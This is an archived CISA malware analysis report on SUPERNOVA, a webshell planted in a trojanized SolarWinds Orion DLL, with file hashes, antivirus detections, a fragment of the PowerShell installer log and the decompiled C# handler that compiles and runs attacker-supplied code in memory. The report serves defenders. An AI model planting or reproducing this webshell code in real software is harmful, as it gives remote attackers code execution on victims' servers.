{
	"id": "21323452-651a-41c6-9e6b-1dd6d025bd24",
	"created_at": "2026-04-06T00:07:27.175609Z",
	"updated_at": "2026-04-10T13:12:54.256292Z",
	"deleted_at": null,
	"sha1_hash": "35fb57187300d1a84ace0873f609ff825055e72a",
	"title": "MAR-10319053-1.v2 - Supernova | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 76525,
	"plain_text": "MAR-10319053-1.v2 - Supernova | CISA\r\nPublished: 2021-11-17 · Archived: 2026-04-05 12:54:44 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Proftocol (TLP), see http://www.cisa.gov/tlp.\r\nSummary\r\nDescription\r\nThis report provides detailed analysis of several malicious artifacts, affecting the SolarWinds Orion product, which have\r\nbeen identified by the security company FireEye as SUPERNOVA. According to a SolarWinds advisory, SUPERNOVA is\r\nnot embedded within the Orion platform as a supply chain attack; rather, it is placed by an attacker directly on a system that\r\nhosts SolarWinds Orion and is designed to appear as part of the SolarWinds product. CISA's assessment is that\r\nSUPERNOVA is not part of the SolarWinds supply chain attack described in Alert AA20-352A. See the section in\r\nMicrosoft’s blog titled “Additional malware discovered” for more information.\r\nThis report describes the analysis of a PowerShell script that decodes and installs SUPERNOVA, a malicious webshell\r\nbackdoor. SUPERNOVA is embedded in a trojanized version of the Solarwinds Orion Web Application module called\r\n“App_Web_logoimagehandler.ashx.b6031896.dll.\" The SUPERNOVA malware allows a remote operator to dynamically\r\ninject C# source code into a web portal provided via the SolarWinds software suite. The injected code is compiled and\r\ndirectly executed in memory.\r\nFor a downloadable copy of indicators of compromise (IOCs), see: MAR-10319053-1.v2.stix\r\nReferences\r\nhttps://us-cert.cisa.gov/ncas/alerts/aa20-352a\r\nhttps://www.solarwinds.com/securityadvisory#anchor2\r\nhttps://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/\r\nSubmitted Files (2)\r\n290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 (1.ps1)\r\nc15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 (App_Web_logoimagehandler.ashx....)\r\nFindings\r\n290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nTags\r\ntrojan\r\nDetails\r\nName 1.ps1\r\nSize 10609 bytes\r\nType ASCII text, with very long lines\r\nMD5 4423a4353a0e7972090413deb40d56ad\r\nSHA1 8004d78e6934efb4dea8baf48a589c2c1ed10bf3\r\nSHA256 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nSHA512 5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 1 of 6\n\nssdeep 192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw\r\nEntropy 4.457683\r\nAntivirus\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.G!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n290951fcc7... Contains c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nDescription\r\nThis file is an event log that details the execution of a PowerShell script designed to Base64 decode and install a 32-bit .NET\r\ndynamic-link library (DLL) into the following location:\r\n\"C:\\inetpub\\SolarWinds\\bin\\App_Web_logoimagehandler.ashx.b6031896.dll\r\n(c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71). The DLL is patched with the SUPERNOVA\r\nwebshell and is a replacement for a legitimate SolarWinds DLL.\r\nDisplayed below is a portion of the event log with the victim information redacted. It indicates the malicious PowerShell\r\nwas executed by the legitimate SolarWinds application \"E:\\Program Files\r\n(x86)\\SolarWinds\\Orion\\SolarWinds.BusinessLayerHost.exe.\"\r\n--Begin event log--\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f $bs)' 'S-1-0-0' '-' '-' '0x0000000000000000' 'E:\\Program Files\r\n(x86)\\SolarWinds\\Orion\\SolarWinds.BusinessLayerHost.exe' 'S-1-16-16384'] Computer Name: [redacted].[redacted].net\r\nRecord Number: 12551353 Event Level: 0\r\n--End event log--\r\nc15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName App_Web_logoimagehandler.ashx.b6031896.dll\r\nSize 7680 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 56ceb6d0011d87b6e4d7023d7ef85676\r\nSHA1 75af292f34789a1c782ea36c7127bf6106f595e8\r\nSHA256 c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nSHA512 f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa08\r\nssdeep 192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr\r\nEntropy 4.622450\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 2 of 6\n\nAntiy Trojan/MSIL.Agent\r\nAvira TR/Sunburst.BR\r\nBitDefender Trojan.Supernova.A\r\nClamav Win.Countermeasure.SUPERNOVA-9808999-1\r\nComodo Backdoor\r\nCyren W32/Supernova.GYFL-6114\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Supernova.A (B)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Supernova.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.G!dha\r\nNANOAV Trojan.Win32.Sunburst.iduxaq\r\nQuick Heal Backdoor.Sunburst\r\nSophos Mal/Sunburst-B\r\nSymantec Backdoor.SuperNova\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Trojan.59AF4B5F\r\nTrendMicro House Call Trojan.59AF4B5F\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! Trojan.SunBurst.Win32.3\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\n100 5976f9a3f7dcd2c124f1664003a1bb607bc22abc2c95abe5ecd645a5dbfe2c6c\r\nPE Metadata\r\nCompile Date 2020-03-24 05:16:10-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name None\r\nFile Description  \r\nInternal Name App_Web_logoimagehandler.ashx.b6031896.dll\r\nLegal Copyright  \r\nOriginal Filename App_Web_logoimagehandler.ashx.b6031896.dll\r\nProduct Name None\r\nProduct Version 0.0.0.0\r\nPE Sections\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 3 of 6\n\nMD5 Name Raw Size Entropy\r\n21556dbcb227ba907e33b0847b427ef4 header 512 2.597488\r\n9002a963c87901397a986c3333d09627 .text 5632 5.285309\r\n78888431b10a2bf283387437a750bca3 .rsrc 1024 2.583328\r\n45ded0a8dacde15cb402adfe11b0fe3e .reloc 512 0.081539\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# / Basic .NET\r\nRelationships\r\nc15abaf51e... Contained_Within 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nDescription\r\nThis file is a 32-bit .NET DLL that has been identified as a modified SolarWinds plug-in. The malware patched into this\r\nplug-in has been identified as SUPERNOVA. The modification includes the \"DynamicRun\" export function which is\r\ndesigned to accept and parse provided arguments. The arguments are expected to partially contain C# code, which the\r\nfunction will compile and execute directly in system memory. The purpose of this malware indicates the attacker has\r\nidentified a vulnerability allowing the ability to dynamically provide a custom \"HttpContext\" data structure to the web\r\napplication’s \"ProcessRequest\" function.\r\nThe ProcessRequest function takes an HttpContext Data structure as an argument. It parses portions of the request\r\nsubstructure of the parent HttpContext data structure using the keys “codes”, “clazz”, “method”, and “args”. The parsed data\r\nis placed in the respective variables codes, clazz, method, and args. These four variables are then provided as arguments to\r\nthe DynamicRun function described next.\r\nThe \"DynamicRun\" function is designed to accept C# code and then dynamically compile and execute it. The \"codes\"\r\nvariable provided to the function contains the actual C# code. The \"clazz\" variable provides the class name that is used when\r\ncompiling the source code. The \"method\" variable will contain the function name that will be called for the newly compiled\r\nclass. The \"args\" variable will contain the arguments provided to the executed malicious class.\r\nAfter parsing out and executing the provided code, the \"ProcessRequest\" function will continue on to call a function named\r\n\"WebSettingsDAL.get_NewNOCSiteLogo.\" Analysis indicates this is a valid SolarWinds function designed to render the\r\nproduct logo on a web application.\r\n--Begin ProcessRequest Function--\r\npublic void ProcessRequest(HttpContext context)\r\n{\r\n   try\r\n   {\r\n    string codes = context.Request[\"codes\"];\r\n    string clazz = context.Request[\"clazz\"];\r\n    string method = context.Request[\"method\"];\r\n    string[] args = context.Request[\"args\"].Split('\\n');\r\n    context.Response.ContentType = \"text/plain\";\r\n    context.Response.Write(this.DynamicRun(codes, clazz, method, args));\r\n   }\r\n   catch (Exception ex)\r\n   {\r\n   }\r\n   NameValueCollection queryString = HttpUtility.ParseQueryString(context.Request.Url.Query);\r\n   try\r\n   {\r\n    string str1 = queryString[\"id\"];\r\n    string s;\r\n    if (!(str1 == \"SitelogoImage\"))\r\n    {\r\n       if (!(str1 == \"SiteNoclogoImage\"))\r\n        throw new ArgumentOutOfRangeException(queryString[\"id\"]);\r\n       s = WebSettingsDAL.get_NewNOCSiteLogo();\r\n    }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 4 of 6\n\nelse\r\n       s = WebSettingsDAL.get_NewSiteLogo();\r\n    byte[] buffer = Convert.FromBase64String(s);\r\n    if ((buffer == null || buffer.Length == 0) \u0026\u0026\r\nFile.Exists(HttpContext.Current.Server.MapPath(\"//NetPerfMon//images//NoLogo.gif\")))\r\n       buffer = File.ReadAllBytes(HttpContext.Current.Server.MapPath(\"//NetPerfMon//images//NoLogo.gif\"));\r\n    string str2 = buffer.Length \u003c 2 || buffer[0] != byte.MaxValue || buffer[1] != (byte) 216 ? (buffer.Length \u003c 3 || buffer[0] !=\r\n(byte) 71 || (buffer[1] != (byte) 73 || buffer[2] != (byte) 70) ? (buffer.Length \u003c 8 || buffer[0] != (byte) 137 || (buffer[1] !=\r\n(byte) 80 || buffer[2] != (byte) 78) || (buffer[3] != (byte) 71 || buffer[4] != (byte) 13 || (buffer[5] != (byte) 10 || buffer[6] !=\r\n(byte) 26)) || buffer[7] != (byte) 10 ? \"image/jpeg\" : \"image/png\") : \"image/gif\") : \"image/jpeg\";\r\n    context.Response.OutputStream.Write(buffer, 0, buffer.Length);\r\n    context.Response.ContentType = str2;\r\n    context.Response.Cache.SetCacheability(HttpCacheability.Private);\r\n    context.Response.StatusDescription = \"OK\";\r\n    context.Response.StatusCode = 200;\r\n    return;\r\n   }\r\n   catch (Exception ex)\r\n   {\r\n    LogoImageHandler._log.Error((object) \"Unexpected error trying to provide logo image for the page.\", ex);\r\n   }\r\n   context.Response.Cache.SetCacheability(HttpCacheability.NoCache);\r\n   context.Response.StatusDescription = \"NO IMAGE\";\r\n   context.Response.StatusCode = 500;\r\n}\r\n--End ProcessRequest Function--\r\n--Begin DynamicRun Function--\r\npublic string DynamicRun(string codes, string clazz, string method, string[] args)\r\n{\r\n   ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();\r\n   CompilerParameters options = new CompilerParameters();\r\n   options.ReferencedAssemblies.Add(\"System.dll\");\r\n   options.ReferencedAssemblies.Add(\"System.ServiceModel.dll\");\r\n   options.ReferencedAssemblies.Add(\"System.Data.dll\");\r\n   options.ReferencedAssemblies.Add(\"System.Runtime.dll\");\r\n   options.GenerateExecutable = false;\r\n   options.GenerateInMemory = true;\r\n   string source = codes;\r\n   CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);\r\n   if (compilerResults.Errors.HasErrors)\r\n   {\r\n    // ISSUE: reference to a compiler-generated field\r\n    // ISSUE: reference to a compiler-generated field\r\n    // ISSUE: reference to a compiler-generated field\r\n    // ISSUE: method pointer\r\n    string.Join(Environment.NewLine, (IEnumerable\u003cstring\u003e) Enumerable.Select\u003cCompilerError, string\u003e\r\n((IEnumerable\u003cM0\u003e) compilerResults.Errors.Cast\u003cCompilerError\u003e(), (Func\u003cM0, M1\u003e)\r\n(LogoImageHandler.\\u003C\\u003Ec.\\u003C\\u003E9__3_0 ?? (LogoImageHandler.\\u003C\\u003Ec.\\u003C\\u003E9__3_0 =\r\nnew Func\u003cCompilerError, string\u003e((object) LogoImageHandler.\\u003C\\u003Ec.\\u003C\\u003E9,\r\n__methodptr(\\u003CDynamicRun\\u003Eb__3_0))))));\r\n    Console.WriteLine(\"error\");\r\n    return compilerResults.Errors.ToString();\r\n   }\r\n   object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);\r\n   return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);\r\n}\r\n--End DynamicRun Function--\r\nScreenshots\r\nFigure 1 -\r\nRelationship Summary\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 5 of 6\n\n290951fcc7... Contains c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nc15abaf51e... Contained_Within 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or SayCISA@cisa.dhs.gov .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nJanuary 27, 2021: Initial Version|November 17, 2021: Removed a file that was determined to be a legitimate SolarWinds file\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a"
	],
	"report_names": [
		"ar21-027a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434047,
	"ts_updated_at": 1775826774,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/35fb57187300d1a84ace0873f609ff825055e72a.pdf",
		"text": "https://archive.orkl.eu/35fb57187300d1a84ace0873f609ff825055e72a.txt",
		"img": "https://archive.orkl.eu/35fb57187300d1a84ace0873f609ff825055e72a.jpg"
	}
}